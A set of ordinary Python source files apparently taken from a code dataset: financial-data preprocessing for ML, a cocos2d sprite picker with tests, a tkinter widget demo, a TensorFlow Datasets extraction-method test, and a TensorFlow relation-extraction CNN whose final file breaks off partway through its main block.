for line in file:\n row = np.array(line.split(','))\n current = np.take(row, indices).astype(np.float32)\n if start == 0:\n previous = np.take(row, indices).astype(np.float32)\n previous_volume = np.take(row, volume_index).astype(np.float32)\n start+=1\n else:\n current_volume = np.take(row, volume_index).astype(np.float32)\n sample = np.empty((1,current.size + 1))\n for index in np.arange(current.size):\n sample[0][index] = ((current[index] - previous[index]) / previous[index]) * 100\n sample[0][current.size] = current_volume\n previous = current\n if i < (original_data.size / 13) - targetoffset:\n x .append(sample)\n current_y = ((original_data[(i + targetoffset)*13] - current[0]) / current[0]) * 100\n y.append(current_y)\n i+=1\n return np.array(x),np.array(y)\n\ndef parse_and_normalize_file(filename, targetoffset, mu, sigma, y_max, y_min):\n indices = [1,2,3,4,6,7,8,9,11,12,13,14]\n volume_index = [16]\n original_data = getoriginaldata(filename)\n file = open(filename, 'r')\n start = 0\n previous = []\n x= np.empty([1,13], dtype=np.float32)\n y= np.empty([1], dtype=np.float32)\n i = 0\n for line in file:\n row = np.array(line.split(','))\n current = np.take(row, indices).astype(np.float32)\n if start == 0:\n previous = np.take(row, indices).astype(np.float32)\n previous_volume = np.take(row, volume_index).astype(np.float32)\n start+=1\n else:\n current_volume = np.take(row, volume_index).astype(np.float32)\n sample = np.empty((1,current.size + 1))\n for index in np.arange(current.size):\n sample[0][index] = ((current[index] - previous[index]) / previous[index]) * 100\n sample[0][current.size] = current_volume\n previous = current\n if i < (original_data.size / 13) - targetoffset:\n sample = ((sample - mu )/ sigma).astype(np.float32)\n x = np.vstack((x, sample))\n current_y = (((original_data[(i + targetoffset)*13] - current[0]) / current[0]) * 100).astype(np.float32)\n current_y = ((2 * (current_y - y_min) / (y_max-y_min)) - 1).astype(np.float32)\n y = np.vstack((y,current_y))\n i+=1\n x = np.delete(x, 0, 0)\n y = np.delete(y, 0, 0)\n return x, y\n\n\ndef get_mu_sigma_y(filepath, targetoffset):\n files = [f for f in listdir(filepath) if isfile(join(filepath, f))]\n alldata = []\n ally=[]\n mu = np.zeros((13,), dtype=np.float32)\n sigma = np.zeros((13,), dtype=np.float32)\n y_max = 0\n y_min = 0\n 
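# Gather samples from every file so feature-wise statistics can be computed:\n # parse_and_normalize_file later z-scores features as (x - mu) / sigma and\n # rescales targets into [-1, 1] via 2 * (y - y_min) / (y_max - y_min) - 1.\n 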
for f in files:\n x,y = (parsefile(join(filepath, f),targetoffset))\n alldata.append(x)\n ally.append(y)\n\n alldata_matrix = alldata[0]\n ally_matrix = ally[0]\n\n start = 0\n for el in alldata:\n if start !=0:\n alldata_matrix=np.vstack((alldata_matrix, el))\n else:\n start+=1\n\n start = 0\n for ey in ally:\n if start !=0:\n ally_matrix=np.hstack((ally_matrix, ey))\n else:\n start+=1\n\n alldata_matrix=np.matrix(alldata_matrix)\n mu = alldata_matrix.mean(0)\n sigma = alldata_matrix.std(0)\n y_max = ally_matrix.max()\n y_min = ally_matrix.min()\n\n return mu, sigma, y_max, y_min\n\ndef getoriginaldata(filename):\n indices = [1,2,3,4,6,7,8,9,11,12,13,14,16]\n file = open(filename, 'r')\n data = []\n start = 0\n for line in file:\n if start>0:\n row = np.array(line.split(','))\n data = np.append(data, np.take(row, indices).astype(np.float))\n start+=1\n return data\n\ndef getdata():\n path_training=r\"C:\\Users\\huergasi\\MLCode\\myCode\\data\\ib\\30sec\\training_sample\"\n path_testing=r\"C:\\Users\\huergasi\\MLCode\\myCode\\data\\ib\\30sec\\testing_sample\"\n path_validation=r\"C:\\Users\\huergasi\\MLCode\\myCode\\data\\ib\\30sec\\validation_sample\"\n\n training_files= [f for f in listdir(path_training) if isfile(join(path_training, f))]\n testing_files= [f for f in listdir(path_testing) if isfile(join(path_testing, f))]\n validation_files=[f for f in listdir(path_validation) if isfile(join(path_validation, f))]\n\n training_data_x = []\n training_data_y = []\n\n testing_data_x = []\n testing_data_y = []\n\n validation_data_x = []\n validation_data_y = []\n\n targetoffset = 4\n\n mu, sigma, y_max, y_min = get_mu_sigma_y(path_training, targetoffset)\n\n for f in training_files:\n x_train,y_train = parse_and_normalize_file(join(path_training, f),targetoffset, mu, sigma, y_max, y_min)\n training_data_x.append(x_train)\n training_data_y.append(y_train)\n\n for ftest in testing_files:\n x_test,y_test = parse_and_normalize_file(join(path_testing, ftest),targetoffset, mu, sigma, y_max, y_min)\n testing_data_x.append(x_test)\n testing_data_y.append(y_test)\n\n for fval in validation_files:\n x_val,y_val = parse_and_normalize_file(join(path_validation, fval),targetoffset, mu, sigma, y_max, y_min)\n validation_data_x.append(x_val)\n validation_data_y.append(y_val)\n\n return (training_data_x, training_data_y), (validation_data_x, validation_data_y), (testing_data_x, testing_data_y)\n\n\n\n\n\n","sub_path":"scripts/preprocessData.py","file_name":"preprocessData.py","file_ext":"py","file_size_in_byte":5754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"18834983","text":"import math\nfrom bisect import bisect, insort\nfrom cocos.batch import BatchNode\n\nfrom cocos.euclid import Vector2, Matrix3\n\nclass Picker(object):\n \"\"\" A picker to find your children quickly \"\"\"\n def __init__(self):\n self.xChildren = {}\n self.yChildren = {}\n self.xs = []\n self.ys = []\n\n def _insert1d (self, child, ps, pChildren, p1, p2):\n p1pos = bisect(ps, p1)\n if p1pos == 0:\n ps.insert(0, p1)\n pChildren[p1] = set()\n elif ps[p1pos - 1] != p1:\n ps.insert(p1pos, p1)\n pChildren[p1] = pChildren[ps[p1pos - 1]].copy()\n else:\n p1pos -= 1\n p2pos = bisect(ps, p2)\n if ps[p2pos - 1] != p2:\n ps.insert(p2pos, p2)\n pChildren[p2] = pChildren[ps[p2pos - 1]].copy()\n else:\n p2pos -= 1\n for i in range(p1pos, p2pos):\n pChildren[ps[i]].add(child)\n\n def insert(self, child, x1, y1, x2, y2):\n \"\"\" Add a child \"\"\"\n self._insert1d(child, self.xs, 
self.xChildren, x1, x2)\n self._insert1d(child, self.ys, self.yChildren, y1, y2)\n\n def childrenAt(self, x, y):\n xPos = bisect(self.xs, x)\n if xPos == 0: return set()\n yPos = bisect(self.ys, y)\n if yPos == 0: return set()\n\n canditates = self.xChildren[self.xs[xPos-1]].intersection(self.yChildren[self.ys[yPos-1]])\n return [child for child in canditates if self._point_inside_child(x, y, child)]\n\n def _point_inside_child(self, x, y, child):\n \"\"\"\n \"\"\"\n # import pdb; pdb.set_trace()\n point = Vector2(x, y)\n cpos = Vector2(child.x, child.y)\n\n angle = math.radians(child.rotation)\n local_point = (Matrix3.new_rotate(angle) * (point - cpos)) * child.scale\n half_w, half_h = (child.width / 2) * child.scale, (child.height / 2) * child.scale\n\n if abs(local_point.x) < half_w and abs(local_point.y) < half_h:\n return True\n else:\n return False\n\n\n def _delete1d(self, child, ps, pChildren, p1, p2):\n p1Pos = bisect(ps, p1) - 1\n p2Pos = bisect(ps, p2) - 1\n for i in range(p1Pos, p2Pos):\n pChildren[ps[i]].remove(child)\n if pChildren[ps[p1Pos]] == pChildren[ps[p1Pos - 1]]:\n del pChildren[ps[p1Pos]]\n ps.pop(p1Pos)\n p2Pos -=1\n if pChildren[ps[p2Pos]] == pChildren[ps[p2Pos - 1]]:\n del pChildren[ps[p2Pos]]\n ps.pop(p2Pos)\n\n def delete(self, child, x1, y1, x2, y2):\n \"\"\" Delete all occurrences of child between x1, y1, x2, y1 \"\"\"\n self._delete1d(child, self.xs, self.xChildren, x1, x2)\n self._delete1d(child, self.ys, self.yChildren, y1, y2)\n\nfrom cocos.euclid import Matrix3, Vector2\nclass NodePicker(Picker):\n \"\"\" Wrap a CocosNode, and keep its children in a Picker \"\"\"\n def __init__(self):\n self.children = {}\n super(NodePicker, self).__init__()\n\n def hotspot(self, child):\n x = - child.image_anchor_x * child.scale\n y = - child.image_anchor_y * child.scale\n m = Matrix3.new_rotate(child.rotation)\n p1 = m * Vector2(x, y)\n p2 = m * Vector2(x + child.width, y)\n p3 = m * Vector2(x, y + child.height)\n p4 = m * Vector2(x + child.width, y + child.height)\n x1 = min(p1.x, p2.x, p3.x, p4.x)\n y1 = min(p1.y, p2.y, p3.y, p4.y)\n x2 = max(p1.x, p2.x, p3.x, p4.x)\n y2 = max(p1.y, p2.y, p3.y, p4.y)\n return int(child.x + x1), int(child.y + y1), int(child.x + x2), int(child.y + y2)\n\n def add(self, child):\n self.children[child] = self.hotspot(child)\n self.insert(child, *self.children[child])\n\n def remove(self, child):\n self.delete(child, *self.children[child])\n\n def update(self, child):\n self.remove(child)\n self.add(child)\n\nclass PickerBatchNode(BatchNode):\n\n def __init__(self):\n self.picker = NodePicker()\n super(PickerBatchNode, self).__init__()\n\n def add(self, child, z=0, name=None):\n child.register(self, 'x')\n child.register(self, 'y')\n child.register(self, 'position')\n child.register(self, 'rotation')\n child.register(self, 'scale')\n self.picker.add(child)\n super(PickerBatchNode, self).add(child, z, name)\n\n def remove(self, child):\n child.unregister(self, 'x')\n child.unregister(self, 'y')\n child.unregister(self, 'position')\n child.unregister(self, 'rotation')\n child.unregister(self, 'scale')\n self.picker.remove(child)\n super(PickerBatchNode, self).remove(child)\n\n def on_notify(self, node, attribute):\n self.picker.update(node)\n\n def childrenAt(self, x, y):\n return self.picker.childrenAt(x, y)\n\nif __name__ == '__main__':\n import unittest\n class TestPicker(unittest.TestCase):\n def testPicker(self):\n t = Picker()\n t.insert(\"A\", 1, 2, 3, 4)\n t.insert(\"B\", 2, 3, 4, 5)\n t.insert(\"C\", 3, 4, 5, 6)\n t.insert(\"D\", 1, 
1, 6, 6)\n self.assertEquals(set([\"A\", \"D\"]), t.childrenAt(2.5, 2.5))\n t.delete(\"D\", 1, 1, 6, 6)\n self.assertEquals(set([\"A\"]), t.childrenAt(2.5, 2.5))\n t.delete(\"B\", 2, 3, 4, 5)\n t.insert(\"B\", 1, 1, 3, 3)\n self.assertEquals(set([\"A\", \"B\"]), t.childrenAt(2.5, 2.5))\n\n unittest.main()\n\n","sub_path":"gamelib/tiless_editor/picker.py","file_name":"picker.py","file_ext":"py","file_size_in_byte":5442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"1768066","text":"import tkinter as tk\nfrom tkinter import ttk\n\nclass Aplicacion:\n def __init__(self):\n #Form/window\n self.ventana1=tk.Tk()\n \n #Label\n self.label1=tk.Label(self.ventana1, text=\"Hola y saludos: \")\n self.label1.grid(column=0, row=0)\n\n #Text box/entry\n self.entry1=tk.Entry(self.ventana1, width=10)\n self.entry1.grid(column=0, row=1)\n\n #RadioButton\n self.radio1=tk.Radiobutton(self.ventana1,text=\"Selection\")\n self.radio1.grid(column=0, row=2)\n\n #Checkbutton\n self.check1=tk.Checkbutton(self.ventana1, text=\"Python\")\n self.check1.grid(column=0, row=3)\n\n #Listbox\n self.list1=tk.Listbox(self.ventana1)\n self.list1.grid(column=0, row=4)\n self.list1.insert(0,\"galletas\")\n self.list1.insert(1,\"pan\")\n\n #Combobox\n dias=(\"Lunes\", \"Martes\", \"Miercoles\")\n self.combobox1=ttk.Combobox(self.ventana1, width=10, values=dias)\n self.combobox1.current(0)\n self.combobox1.grid(column=0, row=5)\n\n #Menubar\n menubar1=tk.Menu(self.ventana1)\n self.ventana1.config(menu=menubar1)\n opciones1=tk.Menu(menubar1)\n opciones1.add_command(label=\"Abrir\")\n opciones1.add_command(label=\"Guardar\")\n opciones1.add_command(label=\"Salir\")\n menubar1.add_cascade(label=\"Archivo\", menu=opciones1)\n\n\n\n self.ventana1.mainloop()\n\naplicacion1=Aplicacion()","sub_path":"Evidencia 84_VSCode_tk_controles.py","file_name":"Evidencia 84_VSCode_tk_controles.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"517476162","text":"# coding=utf-8\n# Copyright 2018 The TensorFlow Datasets Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Tests for resource module.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nfrom tensorflow_datasets.core.download import resource\n\nNO_EXTRACT = resource.ExtractMethod.NO_EXTRACT\nTAR = resource.ExtractMethod.TAR\nTAR_GZ = resource.ExtractMethod.TAR_GZ\nGZIP = resource.ExtractMethod.GZIP\nZIP = resource.ExtractMethod.ZIP\n\n\nclass GuessExtractMethodTest(tf.test.TestCase):\n\n def test_(self):\n for fname, expected_result in [\n ('bar.tar.gz', TAR_GZ),\n ('bar.gz', GZIP),\n ('bar.tar.zip', ZIP),\n ('bar.gz.strange', NO_EXTRACT),\n ('bar.tar', TAR),\n ]:\n res = resource._guess_extract_method(fname)\n self.assertEqual(res, expected_result, '(%s)->%s instead of %s' % (\n fname, res, expected_result))\n
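 # The cases above exercise _guess_extract_method's suffix handling: the\n # last recognised extension wins and unknown suffixes fall back to\n # NO_EXTRACT. One more direct check in the same spirit (hedged addition):\n self.assertEqual(resource._guess_extract_method('baz.zip'), ZIP)\n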
\n\nif __name__ == '__main__':\n tf.test.main()\n","sub_path":"tensorflow_datasets/core/download/resource_test.py","file_name":"resource_test.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"403861723","text":"import tensorflow as tf\nimport numpy as np\nimport random\nimport tensorflow.contrib.layers as layers\nfrom tensorflow.contrib import rnn\nfrom tqdm import tqdm\n\n\n\nclass Settings(object):\n def __init__(self):\n self.vocab_size = 114042\n self.len_sentence = 70\n self.num_epochs = 3 # each epoch makes one pass over the whole training set\n self.num_classes = 53\n self.cnn_size = 230\n self.num_layers = 1\n self.pos_size = 5\n self.pos_num = 123\n self.word_embedding = 50\n self.keep_prob = 0.5\n self.batch_size = 300 # size of each mini-batch\n self.num_steps = 10000\n self.lr = 0.001\n\n\nclass CNN():\n\n def __init__(self, word_embeddings, setting):\n\n self.vocab_size = setting.vocab_size\n self.len_sentence = len_sentence = setting.len_sentence\n self.num_epochs = setting.num_epochs\n self.num_classes = num_classes = setting.num_classes\n self.cnn_size = setting.cnn_size\n self.num_layers = setting.num_layers\n self.pos_size = setting.pos_size\n self.pos_num = setting.pos_num\n self.word_embedding = setting.word_embedding\n self.lr = setting.lr\n\n\n # tf.get_variable fetches an existing variable with these parameters or creates a new one.\n # Define the variables used in the TF graph\n word_embedding = tf.get_variable(initializer=word_embeddings, name='word_embedding')\n pos1_embedding = tf.get_variable('pos1_embedding', [self.pos_num, self.pos_size])\n pos2_embedding = tf.get_variable('pos2_embedding', [self.pos_num, self.pos_size])\n # relation_embedding = tf.get_variable('relation_embedding', [self.num_classes, self.cnn_size])\n\n # Placeholders are bound to feed_dict: a placeholder receives its input value\n # only at run time, supplied through feed_dict in Session.run().\n self.input_word = tf.placeholder(dtype=tf.int32, shape=[None, len_sentence], name='input_word')\n self.input_pos1 = tf.placeholder(dtype=tf.int32, shape=[None, len_sentence], name='input_pos1')\n self.input_pos2 = tf.placeholder(dtype=tf.int32, shape=[None, len_sentence], name='input_pos2')\n self.input_y = tf.placeholder(dtype=tf.float32, shape=[None, num_classes], name='input_y')\n self.keep_prob = tf.placeholder(tf.float32)\n\n # Look up input_word in the word_embedding table\n self.input_word_ebd = tf.nn.embedding_lookup(word_embedding, self.input_word)\n self.input_pos1_ebd = tf.nn.embedding_lookup(pos1_embedding, self.input_pos1)\n self.input_pos2_ebd = tf.nn.embedding_lookup(pos2_embedding, self.input_pos2)\n\n print(\"input_word_ebd: \", self.input_word_ebd)\n print(\"input_pos1_ebd: \", self.input_pos1_ebd)\n print(\"input_pos2_ebd: \", self.input_pos2_ebd)\n\n # Concatenate the list of values along dimension \"axis\".\n self.inputs = tf.concat(axis=2, values=[self.input_word_ebd, self.input_pos1_ebd, self.input_pos2_ebd])\n\n print(\"inputs: \", self.inputs)\n\n self.inputs = tf.reshape(self.inputs, [-1, self.len_sentence, self.word_embedding + self.pos_size * 2, 1])\n\n print(\"inputs: \", self.inputs)\n\n '''\n Convolution layer\n inputs: an input tensor (half, float32 or float64).\n kernel_size: an integer or pair of integers giving the height and width of the convolution window.\n stride: the stride of the sliding window for each input dimension.\n padding: 'SAME' or 'VALID', the padding algorithm to use.\n '''\n self.conv = layers.conv2d(inputs=self.inputs, num_outputs=self.cnn_size, kernel_size=[3, 60], stride=[1, 60],\n padding='SAME')\n print(\"conv: \", self.conv)\n '''\n Max pooling\n kernel_size: the size of the pooling window.\n stride: the stride of the sliding window.\n '''\n self.max_pool = layers.max_pool2d(self.conv, kernel_size=[70, 1], stride=[1, 1])\n
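 # Shape sketch (assuming the defaults above): inputs is (batch, 70, 60, 1);\n # the [3, 60] kernel with stride [1, 60] and SAME padding gives a conv\n # output of (batch, 70, 1, 230), and max-pooling over [70, 1] leaves\n # (batch, 1, 1, 230) -- one 230-d feature vector per sentence.\n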
\n print(\"max_pool: \",self.max_pool)\n # Fully connected part\n # Reshape the pooled output to [batch, cnn_size]\n self.sentence = tf.reshape(self.max_pool, [-1, self.cnn_size])\n\n print(\"sentence: \", self.sentence)\n # tanh of the sentence vector, usually combined with dropout\n self.tanh = tf.nn.tanh(self.sentence)\n # dropout reduces over-fitting; it is normally applied to fully connected layers\n self.drop = layers.dropout(self.tanh, keep_prob=self.keep_prob)\n\n\n # Add a fully connected layer and return its output\n self.outputs = layers.fully_connected(inputs=self.drop, num_outputs=self.num_classes, activation_fn=tf.nn.softmax)\n\n print(\"outputs: \", self.outputs)\n print(\"input_y: \", self.input_y)\n\n '''\n self.y_index = tf.argmax(self.input_y,1,output_type=tf.int32)\n self.indexes = tf.range(0, tf.shape(self.outputs)[0]) * tf.shape(self.outputs)[1] + self.y_index\n self.responsible_outputs = - tf.reduce_mean(tf.log(tf.gather(tf.reshape(self.outputs, [-1]),self.indexes)))\n '''\n # loss function\n # self.cross_loss = -tf.reduce_mean( tf.log(tf.reduce_sum( self.input_y * self.outputs ,axis=1)))\n\n\n # cross-entropy loss\n self.cross_loss = -tf.reduce_mean(tf.reduce_sum(self.input_y * tf.log(self.outputs), axis=1))\n self.cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\n logits=self.outputs, labels=self.input_y\n ))\n # reward\n self.reward = tf.log(tf.reduce_sum(self.input_y * self.outputs, axis=1))\n\n self.l2_loss = tf.contrib.layers.apply_regularization(regularizer=tf.contrib.layers.l2_regularizer(0.0001),\n weights_list=tf.trainable_variables())\n\n self.final_loss = self.cross_loss + self.l2_loss\n\n # accuracy\n # argmax returns the index of the largest value in a 1-D tensor\n self.pred = tf.argmax(self.outputs, axis=1)\n self.pred_prob = tf.reduce_max(self.outputs, axis=1)\n\n self.y_label = tf.argmax(self.input_y, axis=1)\n # compare pred with y_label into a boolean vector,\n # cast it to float,\n # and average to obtain the accuracy\n self.accuracy = tf.reduce_mean(tf.cast(tf.equal(self.pred, self.y_label), 'float'))\n\n # minimize loss\n # minimise the loss with the Adam optimizer\n optimizer = tf.train.AdamOptimizer(self.lr)\n self.train_op = optimizer.minimize(self.final_loss)\n\n # Return all variables created with trainable=True.\n self.tvars = tf.trainable_variables()\n\n # manual parameter updates: create one placeholder per trainable variable\n # and collect them in tvars_holders so values can be fed in from outside\n self.tvars_holders = []\n for idx, var in enumerate(self.tvars):\n placeholder = tf.placeholder(tf.float32, name=str(idx) + '_holder')\n self.tvars_holders.append(placeholder)\n\n # build assign ops that overwrite each variable with its placeholder value\n self.update_tvar_holder = []\n for idx, var in enumerate(self.tvars):\n update_tvar = tf.assign(var, self.tvars_holders[idx])\n self.update_tvar_holder.append(update_tvar)\n\n\ndef train(path_train_word, path_train_pos1, path_train_pos2, path_train_y, save_path):\n print('reading wordembedding')\n # load the pre-trained word embeddings\n wordembedding = np.load('./data/vec.npy', allow_pickle=True)\n\n print('reading training data')\n\n cnn_train_word = np.load(path_train_word)\n cnn_train_pos1 = np.load(path_train_pos1)\n cnn_train_pos2 = np.load(path_train_pos2)\n cnn_train_y = np.load(path_train_y)\n\n settings = Settings()\n settings.vocab_size = len(wordembedding)\n settings.num_classes = len(cnn_train_y[0])\n settings.num_steps = len(cnn_train_word) // settings.batch_size\n\n with tf.Graph().as_default():\n sess = tf.Session()\n with sess.as_default():\n\n # Xavier weight initialisation\n initializer = tf.contrib.layers.xavier_initializer()\n with tf.variable_scope(\"model\", reuse=None, initializer=initializer):\n model = CNN(word_embeddings=wordembedding, setting=settings)\n
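\n # Every variable created inside the \"model\" scope above inherits the\n # Xavier initialiser, which keeps activation variance roughly stable\n # across layers at the start of training.\n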
\n # Run the graph and initialise all variables\n sess.run(tf.global_variables_initializer())\n # tf.train.Saver saves and restores variables (and therefore the model)\n # saver = tf.train.Saver()\n # saver.restore(sess,save_path=save_path)\n for epoch in range(1, settings.num_epochs + 1):\n\n # progress bar\n bar = tqdm(range(settings.num_steps), desc='epoch {}, loss=0.000000, accuracy=0.000000'.format(epoch))\n\n for _ in bar:\n # sample batch_size unique random indices into the training set\n sample_list = random.sample(range(len(cnn_train_y)), settings.batch_size)\n # gather the corresponding rows of each array\n batch_train_word = [cnn_train_word[x] for x in sample_list]\n batch_train_pos1 = [cnn_train_pos1[x] for x in sample_list]\n batch_train_pos2 = [cnn_train_pos2[x] for x in sample_list]\n batch_train_y = [cnn_train_y[x] for x in sample_list]\n\n # put the training batch into feed_dict\n feed_dict = {}\n feed_dict[model.input_word] = batch_train_word\n feed_dict[model.input_pos1] = batch_train_pos1\n feed_dict[model.input_pos2] = batch_train_pos2\n feed_dict[model.input_y] = batch_train_y\n feed_dict[model.keep_prob] = settings.keep_prob\n\n # run one training step\n _, loss, cross_loss, cost, accuracy = sess.run([model.train_op, model.final_loss, model.cross_loss, model.cost, model.accuracy],\n feed_dict=feed_dict)\n\n conv = sess.run(model.conv, feed_dict=feed_dict)\n max_pool = sess.run(model.max_pool, feed_dict=feed_dict)\n sentence = sess.run(model.sentence, feed_dict=feed_dict)\n tanh = sess.run(model.tanh, feed_dict=feed_dict)\n drop = sess.run(model.drop, feed_dict=feed_dict)\n outputs = sess.run(model.outputs, feed_dict=feed_dict)\n pred = sess.run(model.pred, feed_dict=feed_dict)\n y_label = sess.run(model.y_label, feed_dict=feed_dict)\n\n # print(\"conv: \", conv[0])\n # print(\"max_pool: \", max_pool[0])\n print(\"sentence[0]: \", sentence[0])\n print(\"sentence: \", sentence)\n # print(\"tanh: \", tanh[0])\n # print(\"drop: \", drop[0])\n # print(\"outputs: \", outputs)\n # print(\"pred: \", pred)\n # print(\"y_label: \", y_label)\n\n\n bar.set_description('epoch {} loss={:.6f} accuracy={:.6f}'.format(epoch, loss, accuracy))\n # print('epoch {} cross_loss={:.6f} cost={:.6f}'.format(epoch, cross_loss, cost))\n # break\n # save the session once training is done\n # saver.save(sess, save_path=save_path)\n # break\n\n\nclass interaction():\n\n def __init__(self, sess, save_path='model/model.ckpt3'):\n\n self.settings = Settings()\n wordembedding = np.load('./data/vec.npy', allow_pickle=True)\n\n self.sess = sess\n with tf.variable_scope(\"model\"):\n self.model = CNN(word_embeddings=wordembedding, setting=self.settings)\n\n self.saver = tf.train.Saver()\n self.saver.restore(self.sess, save_path)\n\n self.train_word = np.load('./data/train_word.npy', allow_pickle=True)\n self.train_pos1 = np.load('./data/train_pos1.npy', allow_pickle=True)\n self.train_pos2 = np.load('./data/train_pos2.npy', allow_pickle=True)\n self.y_train = np.load('data/train_y.npy', allow_pickle=True)\n\n # test data\n self.testall_word = np.load('./data/testall_word.npy', allow_pickle=True)\n self.testall_pos1 = np.load('./data/testall_pos1.npy', allow_pickle=True)\n self.testall_pos2 = np.load('./data/testall_pos2.npy', allow_pickle=True)\n\n # Compute the reward for a batch\n def reward(self, batch_test_word, batch_test_pos1, batch_test_pos2, batch_test_y):\n\n feed_dict = {}\n feed_dict[self.model.input_word] = batch_test_word\n feed_dict[self.model.input_pos1] = batch_test_pos1\n feed_dict[self.model.input_pos2] = batch_test_pos2\n feed_dict[self.model.input_y] = batch_test_y\n feed_dict[self.model.keep_prob] = 1\n outputs = (self.sess.run(self.model.reward, feed_dict=feed_dict))\n return (outputs)\n\n 
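# Note: self.model.reward is the log-probability the CNN assigns to the\n # gold relation; produce_rldata() below appears to gather these values for\n # the policy-gradient (RL) stage of the project.\n 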
# Compute the sentence embedding (the pooled sentence vector) for a batch\n def sentence_ebd(self, batch_test_word, batch_test_pos1, batch_test_pos2, batch_test_y):\n feed_dict = {}\n feed_dict[self.model.input_word] = batch_test_word\n feed_dict[self.model.input_pos1] = batch_test_pos1\n feed_dict[self.model.input_pos2] = batch_test_pos2\n feed_dict[self.model.input_y] = batch_test_y\n feed_dict[self.model.keep_prob] = 1\n outputs = self.sess.run(self.model.sentence, feed_dict=feed_dict)\n return (outputs)\n\n # Predict the relation and its probability for a batch\n def test(self, batch_test_word, batch_test_pos1, batch_test_pos2):\n feed_dict = {}\n feed_dict[self.model.input_word] = batch_test_word\n feed_dict[self.model.input_pos1] = batch_test_pos1\n feed_dict[self.model.input_pos2] = batch_test_pos2\n feed_dict[self.model.keep_prob] = 1\n relation, prob = self.sess.run([self.model.pred, self.model.pred_prob], feed_dict=feed_dict)\n\n return (relation, prob)\n\n def update_cnn(self, update_word, update_pos1, update_pos2, update_y, updaterate):\n\n num_steps = len(update_word) // self.settings.batch_size\n\n with self.sess.as_default():\n\n tvars_old = self.sess.run(self.model.tvars)\n\n for i in tqdm(range(num_steps)):\n batch_word = update_word[i * self.settings.batch_size:(i + 1) * self.settings.batch_size]\n batch_pos1 = update_pos1[i * self.settings.batch_size:(i + 1) * self.settings.batch_size]\n batch_pos2 = update_pos2[i * self.settings.batch_size:(i + 1) * self.settings.batch_size]\n batch_y = update_y[i * self.settings.batch_size:(i + 1) * self.settings.batch_size]\n\n feed_dict = {}\n feed_dict[self.model.input_word] = batch_word\n feed_dict[self.model.input_pos1] = batch_pos1\n feed_dict[self.model.input_pos2] = batch_pos2\n feed_dict[self.model.input_y] = batch_y\n feed_dict[self.model.keep_prob] = self.settings.keep_prob\n # _, loss, accuracy = sess.run([self.model.train_op,self.model.final_loss, self.model.accuracy], feed_dict=feed_dict)\n self.sess.run(self.model.train_op, feed_dict=feed_dict)\n\n # get tvars_new\n tvars_new = self.sess.run(self.model.tvars)\n\n # update old variables of the target network\n tvars_update = self.sess.run(self.model.tvars)\n for index, var in enumerate(tvars_update):\n tvars_update[index] = updaterate * tvars_new[index] + (1 - updaterate) * tvars_old[index]\n\n feed_dict = dictionary = dict(zip(self.model.tvars_holders, tvars_update))\n self.sess.run(self.model.update_tvar_holder, feed_dict)\n\n # Compute the mean predicted probability for each relation\n def produce_ac(self):\n\n testall_word = self.testall_word\n testall_pos1 = self.testall_pos1\n testall_pos2 = self.testall_pos2\n dict_ac={}\n len_batch = len(testall_word)\n\n with self.sess.as_default():\n for batch in tqdm(range(len_batch)):\n batch_word = testall_word[batch]\n batch_pos1 = testall_pos1[batch]\n batch_pos2 = testall_pos2[batch]\n\n (tmp_relation, tmp_prob) = self.test(batch_word, batch_pos1, batch_pos2)\n tmp_prob=list(tmp_prob)\n tmp_relation=list(tmp_relation)\n dict_ac.setdefault(tmp_relation[0],[]).append(tmp_prob[0])\n\n for k,v in dict_ac.items():\n dict_ac[k]=np.mean(np.array(v))\n\n return dict_ac\n\n def produce_new_embedding(self):\n\n # produce reward sentence_ebd average_reward\n train_word = self.train_word\n train_pos1 = self.train_pos1\n train_pos2 = self.train_pos2\n y_train = self.y_train\n all_sentence_ebd = []\n all_reward = []\n all_reward_list = []\n len_batch = len(train_word)\n\n with self.sess.as_default():\n for batch in tqdm(range(len_batch)):\n batch_word = train_word[batch]\n batch_pos1 = train_pos1[batch]\n batch_pos2 = train_pos2[batch]\n # batch_y = train_y[batch]\n batch_y = [y_train[batch] for x in range(len(batch_word))]\n
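 # Each bag of sentences shares a single relation label, so batch_y simply\n # repeats the bag's one-hot label once per sentence.\n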
\n tmp_sentence_ebd = self.sentence_ebd(batch_word, batch_pos1, batch_pos2, batch_y)\n tmp_reward = self.reward(batch_word, batch_pos1, batch_pos2, batch_y)\n\n all_sentence_ebd.append(tmp_sentence_ebd)\n all_reward.append(tmp_reward)\n all_reward_list += list(tmp_reward)\n\n all_reward_list = np.array(all_reward_list)\n average_reward = np.mean(all_reward_list)\n average_reward = np.array(average_reward)\n\n all_sentence_ebd = np.array(all_sentence_ebd)\n all_reward = np.array(all_reward)\n\n return average_reward, all_sentence_ebd, all_reward\n\n def save_cnnmodel(self, save_path):\n with self.sess.as_default():\n self.saver.save(self.sess, save_path=save_path)\n\n def tvars(self):\n with self.sess.as_default():\n tvars = self.sess.run(self.model.tvars)\n return tvars\n\n def update_tvars(self, tvars_update):\n with self.sess.as_default():\n feed_dict = dictionary = dict(zip(self.model.tvars_holders, tvars_update))\n self.sess.run(self.model.update_tvar_holder, feed_dict)\n\n\n# produce reward sentence_ebd average_reward\ndef produce_rldata(save_path):\n with tf.Graph().as_default():\n sess = tf.Session()\n with sess.as_default():\n # start = time.time()\n interact = interaction(sess, save_path)\n average_reward, all_sentence_ebd, all_reward = interact.produce_new_embedding()\n\n dict_ac = interact.produce_ac()\n\n np.save('data/average_reward.npy', average_reward)\n np.save('data/all_sentence_ebd.npy', all_sentence_ebd)\n np.save('data/all_reward.npy', all_reward)\n\n print(average_reward)\n print(dict_ac)\n\n\nif __name__ == '__main__':\n # train model\n 